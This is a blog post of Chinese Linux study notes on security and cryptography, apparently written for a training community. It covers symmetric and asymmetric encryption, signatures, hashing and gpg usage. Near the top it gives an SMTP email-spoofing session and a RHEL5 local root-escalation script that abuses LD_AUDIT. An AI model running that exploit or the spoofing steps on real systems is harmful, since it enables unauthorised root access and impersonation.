安全和加密

安全基础
仿冒别人给某人发邮件
telnet 127.0.0.1 25
helo a.com 命令
mail from:god@heaven.com 从某处发来的邮件
rcpt to:root 给某人发邮件
data 数据
subject:hello 邮件名
I miss you 邮件正文
How old are you
. 点代表结束
quit

redhat5普通用户提升管理员权限脚本
mkdir /tmp/wang
ln /bin/ping /tmp/wang/test
exec 3< /tmp/wang/test
rm -rf /tmp/wang
cat > /tmp/wang.c <<eof
void _attribute_((constrector)) init()
{
setuid(0);
system(“/bin/bash”);
}
eof

gcc -w -fPIC -shared -o /tmp/wang /tmp/wang.c
LD_AUDIT=”$ORIGIN” exec /proc/self/fd/3 &> /dev/null

两种加密体系

加密算法
1算法可以公开
2密钥(口令)不公开

love
orzi 每一位字母向后移三位

凯撒密码

对称
data明文–加密key1–data’密文–解密key2–data明文

对称:key1==key2 加密解密都是相同密钥
非对称:key1 != key2 加密解密是不同密钥

非对称
公钥加密对应的另一把私钥解密 Pa,Sa
私钥加密对应的另一把公钥解密 Pb,Sb

数字签名,数据来源的确认
data明文–加密key1=Sa–data’密文–解密key2=Pa–data明文

DES:1G 2G 4分钟 8分钟 对称的
RSA:1G 1G 1分钟 64hour 非对称的

Pb[Sa(data)]

Sb{Pb[Sa(data)]}=Sa(data)

Pa{Sa(data)}=data

md5 128
sha1 160
sha512 512

hash(data)=digest 摘要(密钥)
1 data不同,摘要必不同(密钥)
2 摘要(密钥)相同,data相同
3 不论data大小,digest大小只能算法有关
4 hash算法,不可逆
md5sum case.sh 得出摘要 16进制 数据不变摘要之不变 得到摘要值推算不出data不可逆
sha1sum f1.sh 160位的16进制数
两种算法已被破解 山东大学教授王小云
sha512sum file

1 Pb[Sa(data)]

2 Pb{data+Sa[hash(data)]}
Sb{Pb{data+Sa[hash(data)]}}=data+Sa[hash(data)]
hash(data)=A
Pa{Sa[hash(data)]}=hash(data)=B
A=B?

3 对称 非 hash
key{data+Sa[hash(data)]}+Pb(key)

密钥交换
DH(Deffie-Hellman)
大素数(大质数)能够被1和自己整除的数字
rpm -V bash 查看文件中元数据是否发生变化,包校验
对称密钥
gpg -c file 加密
gpg -d file.gpg 解密
gpg -o file1 -d file.gpg

非对称密钥
gpg –gen–key 生成密钥对
gpg –list–key
cd .gnupg/ 存放生成的密钥的目录
往别的用户导公钥
gpg -a –export -o /app/file.pubkey 生成易读的格式导出到文件
scp … 拷贝
(7)gpg –import /app/file.pub.key 导入公钥
gpg -e -r magedu(公钥) file 用magedu的公钥加密文件
scp .. 拷贝
(6)gpg -d file.gpg 解密

本文来自投稿,不代表Linux运维部落立场,如若转载,请注明出处:http://www.178linux.com/91185

(0)
liuyongweiliuyongwei
上一篇 2018-01-17
下一篇 2018-01-17

相关推荐

  • centos 6系统启动流程分析

    linux 系统启动流程: 之前有描述过linux的启动流程,但还有许多模糊的地方,经过一段时间了学习,查资料,看脚本,比初次理解更深,可以将上次模糊或不足的地方描述得比较清楚一些。 先看一张启动流程图。   分析: linux系统的启动流程大概可以分为两大部分: 第一部分为内核空间的启动 第二部分为用户空间的启动 其中,内核空间的启动主要可为分四…

    2017-05-15
  • 什么是CA??

       数字证书认证机构(英语:Certificate Authority,缩写为CA),也称为电子商务认证中心、电子商务认证授权机构,是负责发放和管理数字证书的权威机构,并作为电子商务交易中受信任的第三方,承担公钥体系中公钥的合法性检验的责任。 介绍     CA中心为每个使用公开密钥的用户发放一个…

    Linux干货 2017-07-17
  • centos启动流程

    加电自检 检测硬件是否存在并且能够正常运行,如cpu、内存、硬盘是否存在并能正常运行,以及外围得输入输出设备是否存在,如键盘、鼠标、显示器。 bios启动次序,按照次序查找个引导设备,启动第一个具有引导程序的设备,即为本次启动需要加载的设备。 加载boot loader bootloader安装在mbr中,linux的bootloader程序为grub和li…

    Linux干货 2017-11-14
  • 干货 | 20 行 Python 代码创建可视化地图

    当我开始建造Vincent时, 我的一个目的就是使得地图的建造尽可能合理化. 有一些很棒的python地图库-参见Basemap 和 Kartograph能让地图更有意思. 我强烈推荐这两个工具, 因为他们都很好用而且很强大. 我想有更简单一些的工具,能依靠Vega的力量并且允许简单的语法点到geoJSON文件,详细描述一个投影和大小/比列,最后输出地图. …

    2017-09-08
  • 文件查询、yum安装等零散知识点总结

    归纳重要知识点:文件查询、Linux配置文件、文件的压缩与归档、yum安装包文件   这篇博客介绍以前遗落的重要知识点进行归纳总结,分为四大块:文件查询命令、全局与个人配置文件、文件的压缩与归档、yum命令安装程序包的相关条件与操作。下面结合个人理解与学习内容一一进行总结。     一.文件查询命令locate与find &nb…

    Linux干货 2016-08-26
  • CentOS 6.5下OpenVPN的搭建

    一、openvpn原理 二、安装openvpn 三、制作相关证书     3.1 制作CA证书     3.2 制作Server端证书     3.3 制作Client端证书 四、配置Server端 五、配置Client端 一、openvp…

    Linux干货 2016-04-21